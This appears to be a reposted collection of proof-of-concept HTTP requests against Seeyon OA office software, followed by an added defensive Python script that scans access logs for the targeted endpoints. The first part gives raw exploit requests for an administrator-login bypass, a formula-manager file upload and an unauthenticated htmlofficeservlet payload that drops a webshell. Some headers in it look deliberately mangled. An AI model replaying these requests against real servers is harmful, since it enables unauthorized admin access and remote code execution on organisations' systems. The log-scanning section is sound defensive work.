Seeyon (致远) Vulnerability PoC Collection
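The content of this article was collected from the internet. Use for illegal purposes is prohibited; it is for study only!

Seeyon OA arbitrary administrator login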
POST /seeyon/thirdpartyController.do HTTP/1.1
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

Seeyon OA_V8.1SP2 file upload vulnerability
POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)
Accept-Encoding: gzip,deflate
Cookie:JSESSIONID=5bGx5rW35LmL5YWz
Cache-Control: no-cache
Content-Encoding: deflate
Pragma: no-cache
Host: 1.1.1.1
Accept: text/html,image/gif, image/jpeg,*; q=.2,*/*; q=.2
Content-Length:522729
Connection: close
X-Forwarded-For: 1.2.3.4
arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}

Seeyon OA collaborative management software: GetShell without login
ip/seeyon/htmlofficeservlet
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2
dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
webshell
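
Added example, not part of the original post: a defender-side check that scans web access logs for requests to the three endpoints listed above (thirdpartyController.do, ajax.do with managerName=formulaManager, and htmlofficeservlet). The log lines, IP addresses and rule names are constructed for illustration, and the common access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1" 200 80
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /seeyon/main.do?method=main HTTP/1.1" 200 9000
203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "POST /seeyon/htmlofficeservlet HTTP/1.1" 200 40
198.51.100.9 - - [01/Jan/2024:10:03:00 +0000] "POST /seeyon/ajax.do?method=ajaxAction&managerName=portalManager HTTP/1.1" 200 300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

def classify(verb, target):
    """Return a rule name if the request matches one of the page's three endpoints."""
    parts = urlsplit(target)
    # Match on the last path segment so the rule survives a renamed context path.
    leaf = parts.path.rsplit("/", 1)[-1].lower()
    query = {k.lower(): [v.lower() for v in vs]
             for k, vs in parse_qs(parts.query).items()}
    if leaf == "ajax.do" and "formulamanager" in query.get("managername", []):
        return "formula-manager"          # parameters are in the URL, any verb
    if verb == "POST" and leaf == "thirdpartycontroller.do":
        return "thirdparty-controller"    # method/enc travel in the body, unseen in logs
    if verb == "POST" and leaf == "htmlofficeservlet":
        return "htmlofficeservlet"        # DBSTEP body is not logged either
    return None

def scan(log_text):
    """Return a list of (ip, timestamp, rule, status) for every matching line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines in another format
        rule = classify(m["verb"], m["target"])
        if rule:
            hits.append((m["ip"], m["ts"], rule, int(m["status"])))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Access logs normally omit request bodies, so hits on thirdpartyController.do and htmlofficeservlet are triage leads to correlate with application logs and newly written files, not confirmed exploitation.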